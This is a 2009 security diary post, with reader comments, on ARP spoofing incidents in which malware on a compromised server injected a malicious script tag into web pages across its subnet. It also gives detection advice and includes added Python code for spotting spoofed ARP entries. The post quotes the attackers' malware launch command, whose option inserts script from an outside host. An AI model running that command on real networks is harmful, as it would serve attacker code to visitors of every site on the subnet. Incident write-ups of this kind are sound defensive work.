Massive ARP spoofing attacks on web sites

Published: 2009-03-11. Last Updated: 2009-03-11 00:34:49 UTC
by Bojan Zdrnja (Version: 1)

Recently I’ve been involved in two incidents which had exactly the same modus operandi. The attackers used ARP spoofing to inject malicious JavaScript into content served off other web sites. The biggest problem with such attacks is that they can be very difficult to analyze unless you remember to check layer two network traffic. Such attacks are very covert and endanger all web sites in the same subnet.

So, first a short recap about ARP spoofing. ARP spoofing attacks happen on layer two: the Address Resolution Protocol maps IP addresses to MAC addresses, and MAC addresses are what hosts use to communicate within a local subnet. ARP spoofing attacks are nothing new; they have been happening for years already. The basic idea of an ARP spoofing attack is for the attacker to spoof the IP address <-> MAC address pair of the default gateway. This allows him to intercept (and, if needed, modify) all outgoing traffic from that subnet. The attacker can also spoof the IP address <-> MAC address pair of a local server, in which case he could monitor incoming traffic, but in this scenario that was not necessary.

The spoofing attack consists of the attacker sending ARP packets containing fake data to the target. In normal conditions the target machine will accept this and “believe” whatever the attacker is saying.

This is exactly what happened in both incidents I was involved in. A server on a local subnet was compromised and the attacker installed ARP spoofing malware (together with keyloggers and other Trojans) on the machine. The ARP spoofing malware poisoned the local subnet so that outgoing traffic was tunneled through it. The same malware then inserted malicious JavaScript into every HTML page served by any server on that subnet. You can see how fruitful this is for the attacker: with one compromised server they can effectively attack hundreds of web sites (if the subnet belongs to a hoster).

The ARP spoofing malware they used was relatively common, but still AV detection was miserable with major AV programs missing it (both compromised machines had up to date AV programs installed). In order to start the malware the attackers used a simple BAT script:

svchost.exe -idx 0 -ip IP_address -port 80 -insert "<script language=javascript src=http://embedded/images/new.gif></script>" -Interval 1000 -spoofmode 2

The options of svchost.exe (the dropped malware, not the Windows binary of the same name) are self explanatory: it uses interface 0 (-idx), spoofs the IP address given in the -ip option, and inserts whatever is in the -insert option into every HTML page served.

The nice thing for the attacker is that the administrator of an attacked web site will never figure out what’s going on until he checks the ARP cache or monitors network traffic. The ARP cache can be checked with the arp command (arp -a on both Windows and Linux); one should watch out for unexpected MAC addresses. It usually pays to check the OUI owner of the gateway’s MAC address, because you don’t see Dell routers all that often, as shown in the following Wireshark screenshot of ARP poisoning traffic:

[Wireshark screenshot: ARP poisoning traffic]
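The ARP cache check described above can be automated. The following is an added example, not code from the diary or from any tool it mentions: it parses `arp -a` output in both the Windows and the Linux format, reports MAC addresses that answer for more than one IP address (the gateway entry sharing a MAC with another host on the subnet is the classic symptom), and compares the gateway entry with the MAC and vendor OUI the operator expects. The `arp -a` output, the addresses and the OUI list are constructed for the example; the real OUI for your router vendor comes from the IEEE registry.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Sequence

# One regex handles both Windows rows ("192.168.1.1  aa-bb-cc-dd-ee-ff  dynamic")
# and Linux/BSD rows ("? (192.168.1.1) at aa:bb:cc:dd:ee:ff [ether] on eth0").
ENTRY_RE = re.compile(
    r"(\d{1,3}(?:\.\d{1,3}){3})"                  # IPv4 address
    r".*?"
    r"((?:[0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2})"  # MAC with ':' or '-' separators
)


def normalize_mac(mac: str) -> str:
    """Lower-case, colon-separated form so Windows and Linux entries compare equal."""
    return mac.lower().replace("-", ":")


def parse_arp_table(text: str) -> Dict[str, str]:
    """Map IP -> MAC from `arp -a` output; header lines without a MAC are skipped."""
    table: Dict[str, str] = {}
    for line in text.splitlines():
        m = ENTRY_RE.search(line)
        if m:
            table[m.group(1)] = normalize_mac(m.group(2))
    return table


def find_shared_macs(table: Dict[str, str]) -> Dict[str, List[str]]:
    """Return MACs bound to more than one IP (gateway plus the attacker's host is the classic sign)."""
    by_mac: Dict[str, List[str]] = defaultdict(list)
    for ip, mac in table.items():
        if int(mac[:2], 16) & 1:   # group bit set: broadcast/multicast, legitimately shared
            continue
        by_mac[mac].append(ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


def check_gateway(table: Dict[str, str], gateway_ip: str,
                  expected_mac: Optional[str] = None,
                  router_ouis: Sequence[str] = ()) -> List[str]:
    """Compare the cached gateway MAC with what the operator expects; return findings."""
    mac = table.get(gateway_ip)
    if mac is None:
        return [f"no ARP entry for gateway {gateway_ip}"]
    findings: List[str] = []
    if expected_mac and mac != normalize_mac(expected_mac):
        findings.append(f"gateway {gateway_ip} is {mac}, expected {normalize_mac(expected_mac)}")
    if router_ouis and mac[:8] not in {normalize_mac(o) for o in router_ouis}:
        findings.append(f"gateway {gateway_ip} MAC {mac} has OUI {mac[:8]}, not a known router vendor")
    return findings


# Constructed `arp -a` output from a Windows web server (not a real capture):
# 192.168.1.20 is the compromised host and its MAC now also answers for the gateway.
WINDOWS_ARP_A = """\
Interface: 192.168.1.10 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           aa-bb-cc-dd-ee-ff     dynamic
  192.168.1.20          aa-bb-cc-dd-ee-ff     dynamic
  192.168.1.30          00-11-22-33-44-1e     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Constructed `arp -a` output from a healthy Linux host on the same subnet.
LINUX_ARP_A = """\
gateway (192.168.1.1) at 00:11:22:33:44:01 [ether] on eth0
? (192.168.1.30) at 00:11:22:33:44:1e [ether] on eth0
"""

ROUTER_OUIS = ["00:11:22"]   # placeholder OUI of the router vendor; take the real one from the IEEE list


def run_demo() -> Dict[str, object]:
    """Run the checks over the constructed Windows table and return the findings."""
    win = parse_arp_table(WINDOWS_ARP_A)
    return {
        "shared": find_shared_macs(win),
        "gateway": check_gateway(win, "192.168.1.1",
                                 expected_mac="00-11-22-33-44-01", router_ouis=ROUTER_OUIS),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, "->", value)
```

Broadcast and multicast entries are skipped when looking for shared MACs, because Windows lists those with group addresses that are shared by design; without that filter every Windows host would produce false positives.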

There are various ways of defending against ARP spoofing. One can hard code the MAC addresses of routers on servers (be careful with this, as a change of the default gateway will stop your machines from talking to the Internet until you modify the hard coded address). I would recommend installing Arpwatch, a nice and simple tool that monitors ARP traffic and alerts on attacks. Finally, Cisco (and others, I presume) has features called DHCP Snooping and ARP inspection which can effectively stop ARP poisoning attacks. Sadly, I rarely see these features used, especially in internal networks.
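The recap of ARP spoofing earlier in the diary and the Arpwatch recommendation in this paragraph can be illustrated together. The following is an added example, not code from the diary and not Arpwatch’s own code: it decodes Ethernet/ARP frames and keeps an IP-to-MAC table seeded with the trusted gateway binding, raising an alert when a reply claims the gateway IP with a different MAC, which is the pattern in the incidents described. The frames, addresses and the hypothetical ArpMonitor class are constructed for the example; in practice the frames would come from a capture library such as libpcap.

```python
import struct
from typing import Dict, List, Optional

ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def parse_arp(frame: bytes) -> Optional[dict]:
    """Decode an Ethernet II frame carrying IPv4-over-Ethernet ARP.

    Returns None for anything else, so a monitor can be fed every frame on the wire.
    """
    if len(frame) < 42:                      # 14-byte Ethernet header + 28-byte ARP
        return None
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sha, spa, tha, tpa = struct.unpack("!6s4s6s4s", frame[22:42])
    return {
        "eth_src": mac_str(frame[6:12]),
        "oper": oper,
        "sender_mac": mac_str(sha),
        "sender_ip": ip_str(spa),
        "target_mac": mac_str(tha),
        "target_ip": ip_str(tpa),
    }


class ArpMonitor:
    """Hypothetical arpwatch-style tracker: remembers IP->MAC bindings, alerts on changes."""

    def __init__(self, trusted: Dict[str, str]):
        # Seed with bindings the operator knows, e.g. the default gateway.
        self.bindings: Dict[str, str] = {ip: mac.lower() for ip, mac in trusted.items()}
        self.alerts: List[str] = []

    def observe(self, frame: bytes) -> Optional[str]:
        """Feed one frame; return an alert string, or None if nothing is suspicious."""
        arp = parse_arp(frame)
        if arp is None:
            return None
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        alert = None
        if arp["eth_src"] != mac:
            alert = f"{ip}: ARP sender MAC {mac} differs from Ethernet source {arp['eth_src']}"
        elif ip in self.bindings and self.bindings[ip] != mac:
            alert = f"{ip}: binding changed from {self.bindings[ip]} to {mac}"
        if alert:
            self.alerts.append(alert)
        else:
            self.bindings[ip] = mac          # learn a new host or confirm a known one
        return alert


# Constructed frames (not from a real capture). Gateway 192.168.1.1 is
# 00:11:22:33:44:01, the web server 192.168.1.10 is 00:11:22:33:44:0a and
# aa:bb:cc:dd:ee:ff plays the compromised host.
LEGIT_REPLY = bytes.fromhex(
    "00112233440a" "001122334401" "0806"    # Ethernet: dst, src, EtherType ARP
    "0001" "0800" "06" "04" "0002"          # ARP: Ethernet, IPv4, lengths, reply
    "001122334401" "c0a80101"               # sender: gateway MAC / gateway IP
    "00112233440a" "c0a8010a"               # target: server MAC / server IP
)
SPOOFED_REPLY = bytes.fromhex(
    "00112233440a" "aabbccddeeff" "0806"
    "0001" "0800" "06" "04" "0002"
    "aabbccddeeff" "c0a80101"               # compromised host claims the gateway IP
    "00112233440a" "c0a8010a"
)
NOT_ARP = bytes.fromhex("00112233440a" "001122334401" "0800") + bytes(28)   # an IPv4 frame


def run_demo() -> List[str]:
    """Replay the constructed frames through a monitor seeded with the real gateway."""
    mon = ArpMonitor({"192.168.1.1": "00:11:22:33:44:01"})
    for frame in (LEGIT_REPLY, SPOOFED_REPLY, NOT_ARP):
        mon.observe(frame)
    return mon.alerts


if __name__ == "__main__":
    for line in run_demo():
        print("ALERT:", line)
```

The monitor deliberately keeps the seeded gateway binding when a conflicting reply arrives instead of overwriting it, so a flood of spoofed replies keeps producing alerts rather than silently becoming the new baseline; that is also why seeding the gateway from a known-good state matters.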

Regarding the other malware I mentioned previously, the AV detection rates were similarly poor (in the meantime they have improved). Particularly nasty was the Winlogon Notify hook package, which simply “sniffs” all usernames/passwords of users logging in to the system (so password changes don’t help). This package has been around for ages (the source is public) and I was shocked at how simple modifications made it “invisible” to those AV programs.

--
Bojan
INFIGO IS 

Keywords: arp spoofing

Comments

"In order to start the malware the attackers used a simple BAT script" ...
My assumption: the svchost.exe being called is the legitimate one that comes with Windows. Correct?

I can't seem to find related reference documentation on Microsoft that clearly and completely explains svchost.exe's feature set. Can someone point me to this reference material please?

http://social.msdn.microsoft.com/Search/en-US/?query=svchost.exe%20spoofmode&resultsLang=en-GB&ac=8
No Results Found
I'm gathering svchost.exe was the malware.
Hi Bart. Yes, svchost.exe was the malware they dropped on the system (sorry, I should probably have been clearer about that).
Thanks Bojan.
Fascinating, really. Is the tool able to follow the TCP stream and read the HTTP header? If it doesn't, it's likely to add the link at the end of each frame instead of at the end of each HTML page. The result will probably be corrupted binaries (including images) and pages, and that could help detection. Also, Arpwatch is, apparently, *nix only, while this attack is apparently based on a Windows system. What could be appropriate defenses for co-hosted Windows machines, then?
Stephane, yes the tool is able to read the HTTP header so it injected the malicious script tag only into HTML pages. The malicious script tag was inserted at the beginning of HTML pages.

Regarding arpwatch, you are right that this is a *nix only tool. I'm not sure about similar Windows tools -- if we get some submissions from our readers I will update the diary. The best defense are those special features, if the network gear supports them.
Thanks for the details, Bojan. Please update the diary if you hear about a windows tool that would do the same thing as arpwatch. As a result of your article, I'm writing such a tool right now (using winPcap) but I'd rather not reinvent the wheel :P
Stephane, will do. If you manage to finish the tool let us know, I'm sure other readers will be interested in it as well.
There is an alternative program to arpwatch for Windows - it is called ARP Monitor. It has been in beta stage from early 2008 till now, but it is usable and has a few bugs that don't affect its performance. This program has an English interface, though the author of this program is from Russia. The program uses winpcap, so it should be downloaded and installed separately for the program to work. Here is a link to the author's blog (sorry, it's in Russian) http://blog.kmint21.com/2008/03/12/arp-monitor/
The direct link to the program: http://blog.kmint21.com/kmint21-arp-monitor.exe

btw, in one of his posts that is dated nearly a year ago, the author of this program says that he managed to catch a virus with similar behavior using this program...
Small update to my previous post - the updated version of the ARP Monitor tool is available from http://binaryplant.com/ The new version includes fixes for bugs that were discovered in the first beta.
